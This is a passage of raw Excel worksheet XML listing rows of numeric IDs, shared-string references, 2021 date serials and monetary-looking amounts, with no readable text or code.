        <v>13939</v>
      </c>
      <c r="E4783">
        <v>4</v>
      </c>
      <c r="F4783" t="s">
        <v>9577</v>
      </c>
      <c r="G4783" s="1">
        <v>44316</v>
      </c>
      <c r="H4783">
        <v>240000</v>
      </c>
      <c r="J4783" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4784" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4784">
        <v>25569</v>
      </c>
      <c r="B4784">
        <v>5650</v>
      </c>
      <c r="C4784" t="s">
        <v>9179</v>
      </c>
      <c r="D4784" t="s">
        <v>13939</v>
      </c>
      <c r="E4784">
        <v>4</v>
      </c>
      <c r="F4784" t="s">
        <v>3814</v>
      </c>
      <c r="G4784" s="1">
        <v>44316</v>
      </c>
      <c r="H4784">
        <v>240000</v>
      </c>
      <c r="J4784" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4785" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4785">
        <v>25570</v>
      </c>
      <c r="B4785">
        <v>5650</v>
      </c>
      <c r="C4785" t="s">
        <v>9179</v>
      </c>
      <c r="D4785" t="s">
        <v>13939</v>
      </c>
      <c r="E4785">
        <v>4</v>
      </c>
      <c r="F4785" t="s">
        <v>13940</v>
      </c>
      <c r="G4785" s="1">
        <v>44316</v>
      </c>
      <c r="H4785">
        <v>180000</v>
      </c>
      <c r="J4785" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4786" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4786">
        <v>25571</v>
      </c>
      <c r="B4786">
        <v>5650</v>
      </c>
      <c r="C4786" t="s">
        <v>9179</v>
      </c>
      <c r="D4786" t="s">
        <v>13939</v>
      </c>
      <c r="E4786">
        <v>4</v>
      </c>
      <c r="F4786" t="s">
        <v>13941</v>
      </c>
      <c r="G4786" s="1">
        <v>44316</v>
      </c>
      <c r="H4786">
        <v>120000</v>
      </c>
      <c r="J4786" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4787" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4787">
        <v>25575</v>
      </c>
      <c r="B4787">
        <v>1835</v>
      </c>
      <c r="C4787" t="s">
        <v>6481</v>
      </c>
      <c r="D4787" t="s">
        <v>13942</v>
      </c>
      <c r="E4787">
        <v>6</v>
      </c>
      <c r="F4787" t="s">
        <v>13943</v>
      </c>
      <c r="G4787" s="1">
        <v>44354</v>
      </c>
      <c r="H4787">
        <v>1386</v>
      </c>
      <c r="I4787" t="s">
        <v>13944</v>
      </c>
    </row>
    <row r="4788" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4788">
        <v>25576</v>
      </c>
      <c r="B4788">
        <v>596</v>
      </c>
      <c r="C4788" t="s">
        <v>835</v>
      </c>
      <c r="D4788" t="s">
        <v>13945</v>
      </c>
      <c r="E4788">
        <v>12</v>
      </c>
      <c r="F4788" t="s">
        <v>7296</v>
      </c>
      <c r="G4788" s="1">
        <v>44354</v>
      </c>
      <c r="H4788">
        <v>12000</v>
      </c>
      <c r="I4788" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="4789" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4789">
        <v>25577</v>
      </c>
      <c r="B4789">
        <v>596</v>
      </c>
      <c r="C4789" t="s">
        <v>835</v>
      </c>
      <c r="D4789" t="s">
        <v>13945</v>
      </c>
      <c r="E4789">
        <v>12</v>
      </c>
      <c r="F4789" t="s">
        <v>8913</v>
      </c>
      <c r="G4789" s="1">
        <v>44354</v>
      </c>
      <c r="H4789">
        <v>300000</v>
      </c>
      <c r="I4789" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="4790" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4790">
        <v>25578</v>
      </c>
      <c r="B4790">
        <v>1746</v>
      </c>
      <c r="C4790" t="s">
        <v>6431</v>
      </c>
      <c r="D4790" t="s">
        <v>13946</v>
      </c>
      <c r="E4790">
        <v>16</v>
      </c>
      <c r="F4790" t="s">
        <v>13947</v>
      </c>
      <c r="G4790" s="1">
        <v>44372</v>
      </c>
      <c r="H4790">
        <v>2500</v>
      </c>
      <c r="I4790" t="s">
        <v>13948</v>
      </c>
      <c r="J4790" t="s">
        <v>13949</v>
      </c>
    </row>
    <row r="4791" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4791">
        <v>25579</v>
      </c>
      <c r="B4791">
        <v>1746</v>
      </c>
      <c r="C4791" t="s">
        <v>6431</v>
      </c>
      <c r="D4791" t="s">
        <v>13946</v>
      </c>
      <c r="E4791">
        <v>16</v>
      </c>
      <c r="F4791" t="s">
        <v>13950</v>
      </c>
      <c r="G4791" s="1">
        <v>44372</v>
      </c>
      <c r="H4791">
        <v>1000</v>
      </c>
      <c r="I4791" t="s">
        <v>13948</v>
      </c>
      <c r="J4791" t="s">
        <v>13949</v>
      </c>
    </row>
    <row r="4792" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4792">
        <v>25585</v>
      </c>
      <c r="B4792">
        <v>2802</v>
      </c>
      <c r="C4792" t="s">
        <v>7004</v>
      </c>
      <c r="D4792" t="s">
        <v>10964</v>
      </c>
      <c r="E4792">
        <v>8</v>
      </c>
      <c r="F4792" t="s">
        <v>8230</v>
      </c>
      <c r="G4792" s="1">
        <v>44327</v>
      </c>
      <c r="H4792">
        <v>3600</v>
      </c>
      <c r="I4792" t="s">
        <v>13951</v>
      </c>
    </row>
    <row r="4793" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4793">
        <v>25586</v>
      </c>
      <c r="B4793">
        <v>1448</v>
      </c>
      <c r="C4793" t="s">
        <v>4608</v>
      </c>
      <c r="D4793" t="s">
        <v>13952</v>
      </c>
      <c r="E4793">
        <v>5</v>
      </c>
      <c r="F4793" t="s">
        <v>13953</v>
      </c>
      <c r="G4793" s="1">
        <v>44337</v>
      </c>
      <c r="H4793">
        <v>8650</v>
      </c>
      <c r="I4793" t="s">
        <v>10518</v>
      </c>
      <c r="J4793" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="4794" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4794">
        <v>25587</v>
      </c>
      <c r="B4794">
        <v>1448</v>
      </c>
      <c r="C4794" t="s">
        <v>4608</v>
      </c>
      <c r="D4794" t="s">
        <v>13952</v>
      </c>
      <c r="E4794">
        <v>5</v>
      </c>
      <c r="F4794" t="s">
        <v>13954</v>
      </c>
      <c r="G4794" s="1">
        <v>44337</v>
      </c>
      <c r="H4794">
        <v>8600</v>
      </c>
      <c r="I4794" t="s">
        <v>10518</v>
      </c>
      <c r="J4794" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="4795" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4795">
        <v>25589</v>
      </c>
      <c r="B4795">
        <v>1768</v>
      </c>
      <c r="C4795" t="s">
        <v>6567</v>
      </c>
      <c r="D4795" t="s">
        <v>13955</v>
      </c>
      <c r="E4795">
        <v>12</v>
      </c>
      <c r="F4795" t="s">
        <v>6569</v>
      </c>
      <c r="G4795" s="1">
        <v>44323</v>
      </c>
      <c r="H4795">
        <v>60000</v>
      </c>
      <c r="I4795" t="s">
        <v>10031</v>
      </c>
      <c r="J4795" t="s">
        <v>13956</v>
      </c>
    </row>
    <row r="4796" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4796">
        <v>25590</v>
      </c>
      <c r="B4796">
        <v>5667</v>
      </c>
      <c r="C4796" t="s">
        <v>9187</v>
      </c>
      <c r="D4796" t="s">
        <v>13957</v>
      </c>
      <c r="E4796">
        <v>32</v>
      </c>
      <c r="F4796" t="s">
        <v>11886</v>
      </c>
      <c r="G4796" s="1">
        <v>44368</v>
      </c>
      <c r="H4796">
        <v>64000</v>
      </c>
      <c r="I4796" t="s">
        <v>13958</v>
      </c>
      <c r="J4796" t="s">
        <v>13959</v>
      </c>
    </row>
    <row r="4797" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4797">
        <v>25591</v>
      </c>
      <c r="B4797">
        <v>5667</v>
      </c>
      <c r="C4797" t="s">
        <v>9187</v>
      </c>
      <c r="D4797" t="s">
        <v>13957</v>
      </c>
      <c r="E4797">
        <v>32</v>
      </c>
      <c r="F4797" t="s">
        <v>12898</v>
      </c>
      <c r="G4797" s="1">
        <v>44368</v>
      </c>
      <c r="H4797">
        <v>300000</v>
      </c>
      <c r="I4797" t="s">
        <v>13960</v>
      </c>
      <c r="J4797" t="s">
        <v>13959</v>
      </c>
    </row>
    <row r="4798" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4798">
        <v>25592</v>
      </c>
      <c r="B4798">
        <v>5649</v>
      </c>
      <c r="C4798" t="s">
        <v>2677</v>
      </c>
      <c r="D4798" t="s">
        <v>13961</v>
      </c>
      <c r="E4798">
        <v>26</v>
      </c>
      <c r="F4798" t="s">
        <v>6917</v>
      </c>
      <c r="G4798" s="1">
        <v>44336</v>
      </c>
      <c r="H4798">
        <v>48000</v>
      </c>
      <c r="J4798" t="s">
        <v>9810</v>
      </c>
    </row>
    <row r="4799" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4799">
        <v>25593</v>
      </c>
      <c r="B4799">
        <v>1877</v>
      </c>
      <c r="C4799" t="s">
        <v>6626</v>
      </c>
      <c r="D4799" t="s">
        <v>13962</v>
      </c>
      <c r="E4799">
        <v>26</v>
      </c>
      <c r="F4799" t="s">
        <v>364</v>
      </c>
      <c r="G4799" s="1">
        <v>44350</v>
      </c>
      <c r="H4799">
        <v>540000</v>
      </c>
      <c r="J4799" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="4800" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4800">
        <v>25594</v>
      </c>
      <c r="B4800">
        <v>1877</v>
      </c>
      <c r="C4800" t="s">
        <v>6626</v>
      </c>
      <c r="D4800" t="s">
        <v>13962</v>
      </c>
      <c r="E4800">
        <v>26</v>
      </c>
      <c r="F4800" t="s">
        <v>3204</v>
      </c>
      <c r="G4800" s="1">
        <v>44350</v>
      </c>
      <c r="H4800">
        <v>50</v>
      </c>
      <c r="J4800" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="4801" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4801">
        <v>25595</v>
      </c>
      <c r="B4801">
        <v>1877</v>
      </c>
      <c r="C4801" t="s">
        <v>6626</v>
      </c>
      <c r="D4801" t="s">
        <v>13962</v>
      </c>
      <c r="E4801">
        <v>26</v>
      </c>
      <c r="F4801" t="s">
        <v>547</v>
      </c>
      <c r="G4801" s="1">
        <v>44350</v>
      </c>
      <c r="H4801">
        <v>0</v>
      </c>
      <c r="J4801" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="4802" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4802">
        <v>25596</v>
      </c>
      <c r="B4802">
        <v>1877</v>
      </c>
      <c r="C4802" t="s">
        <v>6626</v>
      </c>
      <c r="D4802" t="s">
        <v>13963</v>
      </c>
      <c r="E4802">
        <v>26</v>
      </c>
      <c r="F4802" t="s">
        <v>7564</v>
      </c>
      <c r="G4802" s="1">
        <v>44350</v>
      </c>
      <c r="H4802">
        <v>500</v>
      </c>
      <c r="J4802" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="4803" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4803">
        <v>25597</v>
      </c>
      <c r="B4803">
        <v>1639</v>
      </c>
      <c r="C4803" t="s">
        <v>16571</v>
      </c>
      <c r="D4803" t="s">
        <v>16572</v>
      </c>
      <c r="E4803">
        <v>17</v>
      </c>
      <c r="F4803" t="s">
        <v>2236</v>
      </c>
      <c r="G4803" s="1">
        <v>44369</v>
      </c>
      <c r="H4803" s="4">
        <v>216000</v>
      </c>
      <c r="J4803" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4804" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4804">
        <v>25598</v>
      </c>
      <c r="B4804">
        <v>1639</v>
      </c>
      <c r="C4804" t="s">
        <v>16571</v>
      </c>
      <c r="D4804" t="s">
        <v>16572</v>
      </c>
      <c r="E4804">
        <v>17</v>
      </c>
      <c r="F4804" t="s">
        <v>13964</v>
      </c>
      <c r="G4804" s="1">
        <v>44369</v>
      </c>
      <c r="H4804" s="4">
        <v>300000</v>
      </c>
      <c r="J4804" t="s">
        <v>13965</v>
      </c>
    </row>
    <row r="4805" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4805">
        <v>25599</v>
      </c>
      <c r="B4805">
        <v>1639</v>
      </c>
      <c r="C4805" t="s">
        <v>16571</v>
      </c>
      <c r="D4805" t="s">
        <v>16572</v>
      </c>
      <c r="E4805">
        <v>17</v>
      </c>
      <c r="F4805" t="s">
        <v>9561</v>
      </c>
      <c r="G4805" s="1">
        <v>44369</v>
      </c>
      <c r="H4805" s="4">
        <v>300000</v>
      </c>
      <c r="J4805" t="s">
        <v>13966</v>
      </c>
    </row>
    <row r="4806" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4806">
        <v>25600</v>
      </c>
      <c r="B4806">
        <v>1639</v>
      </c>
      <c r="C4806" t="s">
        <v>16571</v>
      </c>
      <c r="D4806" t="s">
        <v>16572</v>
      </c>
      <c r="E4806">
        <v>17</v>
      </c>
      <c r="F4806" t="s">
        <v>13967</v>
      </c>
      <c r="G4806" s="1">
        <v>44369</v>
      </c>
      <c r="H4806" s="4">
        <v>10000</v>
      </c>
      <c r="J4806" t="s">
        <v>13968</v>
      </c>
    </row>
    <row r="4807" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4807">
        <v>25603</v>
      </c>
      <c r="B4807">
        <v>2231</v>
      </c>
      <c r="C4807" t="s">
        <v>6592</v>
      </c>
      <c r="D4807" t="s">
        <v>13969</v>
      </c>
      <c r="E4807">
        <v>33</v>
      </c>
      <c r="F4807" t="s">
        <v>3763</v>
      </c>
      <c r="G4807" s="1">
        <v>44323</v>
      </c>
      <c r="H4807">
        <v>100000</v>
      </c>
      <c r="I4807" t="s">
        <v>9693</v>
      </c>
      <c r="J4807" t="s">
        <v>9934</v>
      </c>
    </row>
    <row r="4808" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4808">
        <v>25604</v>
      </c>
      <c r="B4808">
        <v>2231</v>
      </c>
      <c r="C4808" t="s">
        <v>6592</v>
      </c>
      <c r="D4808" t="s">
        <v>13969</v>
      </c>
      <c r="E4808">
        <v>33</v>
      </c>
      <c r="F4808" t="s">
        <v>7241</v>
      </c>
      <c r="G4808" s="1">
        <v>44323</v>
      </c>
      <c r="H4808">
        <v>100000</v>
      </c>
      <c r="I4808" t="s">
        <v>9693</v>
      </c>
      <c r="J4808" t="s">
        <v>13970</v>
      </c>
    </row>
    <row r="4809" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4809">
        <v>25605</v>
      </c>
      <c r="B4809">
        <v>2231</v>
      </c>
      <c r="C4809" t="s">
        <v>6592</v>
      </c>
      <c r="D4809" t="s">
        <v>13969</v>
      </c>
      <c r="E4809">
        <v>33</v>
      </c>
      <c r="F4809" t="s">
        <v>13155</v>
      </c>
      <c r="G4809" s="1">
        <v>44323</v>
      </c>
      <c r="H4809">
        <v>100000</v>
      </c>
      <c r="I4809" t="s">
        <v>9693</v>
      </c>
      <c r="J4809" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="4810" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4810">
        <v>25606</v>
      </c>
      <c r="B4810">
        <v>2231</v>
      </c>
      <c r="C4810" t="s">
        <v>6592</v>
      </c>
      <c r="D4810" t="s">
        <v>13969</v>
      </c>
      <c r="E4810">
        <v>33</v>
      </c>
      <c r="F4810" t="s">
        <v>13971</v>
      </c>
      <c r="G4810" s="1">
        <v>44323</v>
      </c>
      <c r="H4810">
        <v>100000</v>
      </c>
      <c r="I4810" t="s">
        <v>9693</v>
      </c>
      <c r="J4810" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="4811" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4811">
        <v>25609</v>
      </c>
      <c r="B4811">
        <v>5676</v>
      </c>
      <c r="C4811" t="s">
        <v>9193</v>
      </c>
      <c r="D4811" t="s">
        <v>13972</v>
      </c>
      <c r="E4811">
        <v>29</v>
      </c>
      <c r="F4811" t="s">
        <v>13973</v>
      </c>
      <c r="G4811" s="1">
        <v>44350</v>
      </c>
      <c r="H4811">
        <v>200</v>
      </c>
      <c r="I4811" t="s">
        <v>13708</v>
      </c>
    </row>
    <row r="4812" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4812">
        <v>25612</v>
      </c>
      <c r="B4812">
        <v>2253</v>
      </c>
      <c r="C4812" t="s">
        <v>2612</v>
      </c>
      <c r="D4812" t="s">
        <v>9422</v>
      </c>
      <c r="E4812">
        <v>16</v>
      </c>
      <c r="F4812" t="s">
        <v>13974</v>
      </c>
      <c r="G4812" s="1">
        <v>44362</v>
      </c>
      <c r="H4812">
        <v>10</v>
      </c>
      <c r="J4812" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4813" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4813">
        <v>25614</v>
      </c>
      <c r="B4813">
        <v>5582</v>
      </c>
      <c r="C4813" t="s">
        <v>9010</v>
      </c>
      <c r="D4813" t="s">
        <v>13737</v>
      </c>
      <c r="E4813">
        <v>11</v>
      </c>
      <c r="F4813" t="s">
        <v>13975</v>
      </c>
      <c r="G4813" s="1">
        <v>44327</v>
      </c>
      <c r="H4813">
        <v>45000</v>
      </c>
      <c r="I4813" t="s">
        <v>13485</v>
      </c>
    </row>
    <row r="4814" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4814">
        <v>25615</v>
      </c>
      <c r="B4814">
        <v>5684</v>
      </c>
      <c r="C4814" t="s">
        <v>9215</v>
      </c>
      <c r="D4814" t="s">
        <v>13976</v>
      </c>
      <c r="E4814">
        <v>33</v>
      </c>
      <c r="F4814" t="s">
        <v>9217</v>
      </c>
      <c r="G4814" s="1">
        <v>44333</v>
      </c>
      <c r="H4814">
        <v>10000</v>
      </c>
      <c r="I4814" t="s">
        <v>9952</v>
      </c>
    </row>
    <row r="4815" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4815">
        <v>25616</v>
      </c>
      <c r="B4815">
        <v>5681</v>
      </c>
      <c r="C4815" t="s">
        <v>9223</v>
      </c>
      <c r="D4815" t="s">
        <v>11891</v>
      </c>
      <c r="E4815">
        <v>33</v>
      </c>
      <c r="F4815" t="s">
        <v>5434</v>
      </c>
      <c r="G4815" s="1">
        <v>44327</v>
      </c>
      <c r="H4815">
        <v>20000</v>
      </c>
      <c r="I4815" t="s">
        <v>9550</v>
      </c>
      <c r="J4815" t="s">
        <v>13977</v>
      </c>
    </row>
    <row r="4816" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4816">
        <v>25617</v>
      </c>
      <c r="B4816">
        <v>959</v>
      </c>
      <c r="C4816" t="s">
        <v>4593</v>
      </c>
      <c r="D4816" t="s">
        <v>13978</v>
      </c>
      <c r="E4816">
        <v>2</v>
      </c>
      <c r="F4816" t="s">
        <v>9720</v>
      </c>
      <c r="G4816" s="1">
        <v>44378</v>
      </c>
      <c r="H4816">
        <v>20000</v>
      </c>
    </row>
    <row r="4817" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4817">
        <v>25618</v>
      </c>
      <c r="B4817">
        <v>959</v>
      </c>
      <c r="C4817" t="s">
        <v>4593</v>
      </c>
      <c r="D4817" t="s">
        <v>13978</v>
      </c>
      <c r="E4817">
        <v>2</v>
      </c>
      <c r="F4817" t="s">
        <v>13979</v>
      </c>
      <c r="G4817" s="1">
        <v>44378</v>
      </c>
      <c r="H4817">
        <v>20000</v>
      </c>
    </row>
    <row r="4818" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4818">
        <v>25619</v>
      </c>
      <c r="B4818">
        <v>959</v>
      </c>
      <c r="C4818" t="s">
        <v>4593</v>
      </c>
      <c r="D4818" t="s">
        <v>13978</v>
      </c>
      <c r="E4818">
        <v>2</v>
      </c>
      <c r="F4818" t="s">
        <v>9722</v>
      </c>
      <c r="G4818" s="1">
        <v>44378</v>
      </c>
      <c r="H4818">
        <v>20000</v>
      </c>
    </row>
    <row r="4819" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4819">
        <v>25620</v>
      </c>
      <c r="B4819">
        <v>959</v>
      </c>
      <c r="C4819" t="s">
        <v>4593</v>
      </c>
      <c r="D4819" t="s">
        <v>13978</v>
      </c>
      <c r="E4819">
        <v>2</v>
      </c>
      <c r="F4819" t="s">
        <v>9437</v>
      </c>
      <c r="G4819" s="1">
        <v>44378</v>
      </c>
      <c r="H4819">
        <v>20000</v>
      </c>
    </row>
    <row r="4820" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4820">
        <v>25621</v>
      </c>
      <c r="B4820">
        <v>959</v>
      </c>
      <c r="C4820" t="s">
        <v>4593</v>
      </c>
      <c r="D4820" t="s">
        <v>13978</v>
      </c>
      <c r="E4820">
        <v>2</v>
      </c>
      <c r="F4820" t="s">
        <v>1746</v>
      </c>
      <c r="G4820" s="1">
        <v>44378</v>
      </c>
      <c r="H4820">
        <v>20000</v>
      </c>
    </row>
    <row r="4821" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4821">
        <v>25622</v>
      </c>
      <c r="B4821">
        <v>959</v>
      </c>
      <c r="C4821" t="s">
        <v>4593</v>
      </c>
      <c r="D4821" t="s">
        <v>13978</v>
      </c>
      <c r="E4821">
        <v>2</v>
      </c>
      <c r="F4821" t="s">
        <v>9435</v>
      </c>
      <c r="G4821" s="1">
        <v>44378</v>
      </c>
      <c r="H4821">
        <v>10000</v>
      </c>
    </row>
    <row r="4822" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4822">
        <v>25623</v>
      </c>
      <c r="B4822">
        <v>959</v>
      </c>
      <c r="C4822" t="s">
        <v>4593</v>
      </c>
      <c r="D4822" t="s">
        <v>13978</v>
      </c>
      <c r="E4822">
        <v>2</v>
      </c>
      <c r="F4822" t="s">
        <v>2236</v>
      </c>
      <c r="G4822" s="1">
        <v>44378</v>
      </c>
      <c r="H4822">
        <v>10000</v>
      </c>
    </row>
    <row r="4823" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4823">
        <v>25624</v>
      </c>
      <c r="B4823">
        <v>959</v>
      </c>
      <c r="C4823" t="s">
        <v>4593</v>
      </c>
      <c r="D4823" t="s">
        <v>13978</v>
      </c>
      <c r="E4823">
        <v>2</v>
      </c>
      <c r="F4823" t="s">
        <v>13980</v>
      </c>
      <c r="G4823" s="1">
        <v>44378</v>
      </c>
      <c r="H4823">
        <v>10000</v>
      </c>
    </row>
    <row r="4824" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4824">
        <v>25630</v>
      </c>
      <c r="B4824">
        <v>5637</v>
      </c>
      <c r="C4824" t="s">
        <v>9233</v>
      </c>
      <c r="D4824" t="s">
        <v>13981</v>
      </c>
      <c r="E4824">
        <v>16</v>
      </c>
      <c r="F4824" t="s">
        <v>364</v>
      </c>
      <c r="G4824" s="1">
        <v>44358</v>
      </c>
      <c r="H4824">
        <v>6000000</v>
      </c>
      <c r="J4824" t="s">
        <v>9572</v>
      </c>
    </row>
    <row r="4825" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4825">
        <v>25632</v>
      </c>
      <c r="B4825">
        <v>1890</v>
      </c>
      <c r="C4825" t="s">
        <v>6641</v>
      </c>
      <c r="D4825" t="s">
        <v>13982</v>
      </c>
      <c r="E4825">
        <v>4</v>
      </c>
      <c r="F4825" t="s">
        <v>3814</v>
      </c>
      <c r="G4825" s="1">
        <v>44322</v>
      </c>
      <c r="H4825">
        <v>864000</v>
      </c>
      <c r="J4825" t="s">
        <v>10662</v>
      </c>
    </row>
    <row r="4826" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4826">
        <v>25633</v>
      </c>
      <c r="B4826">
        <v>1890</v>
      </c>
      <c r="C4826" t="s">
        <v>6641</v>
      </c>
      <c r="D4826" t="s">
        <v>13982</v>
      </c>
      <c r="E4826">
        <v>4</v>
      </c>
      <c r="F4826" t="s">
        <v>13983</v>
      </c>
      <c r="G4826" s="1">
        <v>44322</v>
      </c>
      <c r="H4826">
        <v>60000</v>
      </c>
      <c r="J4826" t="s">
        <v>10662</v>
      </c>
    </row>
    <row r="4827" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4827">
        <v>25634</v>
      </c>
      <c r="B4827">
        <v>1890</v>
      </c>
      <c r="C4827" t="s">
        <v>6641</v>
      </c>
      <c r="D4827" t="s">
        <v>13982</v>
      </c>
      <c r="E4827">
        <v>4</v>
      </c>
      <c r="F4827" t="s">
        <v>13984</v>
      </c>
      <c r="G4827" s="1">
        <v>44322</v>
      </c>
      <c r="H4827">
        <v>60000</v>
      </c>
      <c r="J4827" t="s">
        <v>10662</v>
      </c>
    </row>
    <row r="4828" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4828">
        <v>25635</v>
      </c>
      <c r="B4828">
        <v>1890</v>
      </c>
      <c r="C4828" t="s">
        <v>6641</v>
      </c>
      <c r="D4828" t="s">
        <v>13982</v>
      </c>
      <c r="E4828">
        <v>4</v>
      </c>
      <c r="F4828" t="s">
        <v>9466</v>
      </c>
      <c r="G4828" s="1">
        <v>44322</v>
      </c>
      <c r="H4828">
        <v>60000</v>
      </c>
      <c r="J4828" t="s">
        <v>10662</v>
      </c>
    </row>
    <row r="4829" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4829">
        <v>25636</v>
      </c>
      <c r="B4829">
        <v>1890</v>
      </c>
      <c r="C4829" t="s">
        <v>6641</v>
      </c>
      <c r="D4829" t="s">
        <v>13982</v>
      </c>
      <c r="E4829">
        <v>4</v>
      </c>
      <c r="F4829" t="s">
        <v>9577</v>
      </c>
      <c r="G4829" s="1">
        <v>44322</v>
      </c>
      <c r="H4829">
        <v>60000</v>
      </c>
      <c r="J4829" t="s">
        <v>10662</v>
      </c>
    </row>
    <row r="4830" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4830">
        <v>25637</v>
      </c>
      <c r="B4830">
        <v>1890</v>
      </c>
      <c r="C4830" t="s">
        <v>6641</v>
      </c>
      <c r="D4830" t="s">
        <v>13982</v>
      </c>
      <c r="E4830">
        <v>4</v>
      </c>
      <c r="F4830" t="s">
        <v>13985</v>
      </c>
      <c r="G4830" s="1">
        <v>44322</v>
      </c>
      <c r="H4830">
        <v>60000</v>
      </c>
    </row>
    <row r="4831" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4831">
        <v>25638</v>
      </c>
      <c r="B4831">
        <v>5687</v>
      </c>
      <c r="C4831" t="s">
        <v>9227</v>
      </c>
      <c r="D4831" t="s">
        <v>13986</v>
      </c>
      <c r="E4831">
        <v>10</v>
      </c>
      <c r="F4831" t="s">
        <v>364</v>
      </c>
      <c r="G4831" s="1">
        <v>44335</v>
      </c>
      <c r="H4831">
        <v>120000</v>
      </c>
      <c r="J4831" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4832" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4832">
        <v>25640</v>
      </c>
      <c r="B4832">
        <v>1589</v>
      </c>
      <c r="C4832" t="s">
        <v>4496</v>
      </c>
      <c r="D4832" t="s">
        <v>13434</v>
      </c>
      <c r="E4832">
        <v>12</v>
      </c>
      <c r="F4832" t="s">
        <v>3242</v>
      </c>
      <c r="G4832" s="1">
        <v>44358</v>
      </c>
      <c r="H4832">
        <v>10000</v>
      </c>
      <c r="I4832" t="s">
        <v>13436</v>
      </c>
    </row>
    <row r="4833" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4833">
        <v>25643</v>
      </c>
      <c r="B4833">
        <v>1510</v>
      </c>
      <c r="C4833" t="s">
        <v>4671</v>
      </c>
      <c r="D4833" t="s">
        <v>13987</v>
      </c>
      <c r="E4833">
        <v>2</v>
      </c>
      <c r="F4833" t="s">
        <v>13988</v>
      </c>
      <c r="G4833" s="1">
        <v>44354</v>
      </c>
      <c r="H4833">
        <v>120000</v>
      </c>
      <c r="I4833" t="s">
        <v>13989</v>
      </c>
      <c r="J4833" t="s">
        <v>10871</v>
      </c>
    </row>
    <row r="4834" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4834">
        <v>25644</v>
      </c>
      <c r="B4834">
        <v>1510</v>
      </c>
      <c r="C4834" t="s">
        <v>4671</v>
      </c>
      <c r="D4834" t="s">
        <v>13987</v>
      </c>
      <c r="E4834">
        <v>2</v>
      </c>
      <c r="F4834" t="s">
        <v>13990</v>
      </c>
      <c r="G4834" s="1">
        <v>44354</v>
      </c>
      <c r="H4834">
        <v>360000</v>
      </c>
      <c r="I4834" t="s">
        <v>13991</v>
      </c>
      <c r="J4834" t="s">
        <v>10871</v>
      </c>
    </row>
    <row r="4835" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4835">
        <v>25645</v>
      </c>
      <c r="B4835">
        <v>1510</v>
      </c>
      <c r="C4835" t="s">
        <v>4671</v>
      </c>
      <c r="D4835" t="s">
        <v>13987</v>
      </c>
      <c r="E4835">
        <v>2</v>
      </c>
      <c r="F4835" t="s">
        <v>13992</v>
      </c>
      <c r="G4835" s="1">
        <v>44354</v>
      </c>
      <c r="H4835">
        <v>3600000</v>
      </c>
      <c r="I4835" t="s">
        <v>13993</v>
      </c>
      <c r="J4835" t="s">
        <v>10871</v>
      </c>
    </row>
    <row r="4836" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4836">
        <v>25646</v>
      </c>
      <c r="B4836">
        <v>1510</v>
      </c>
      <c r="C4836" t="s">
        <v>4671</v>
      </c>
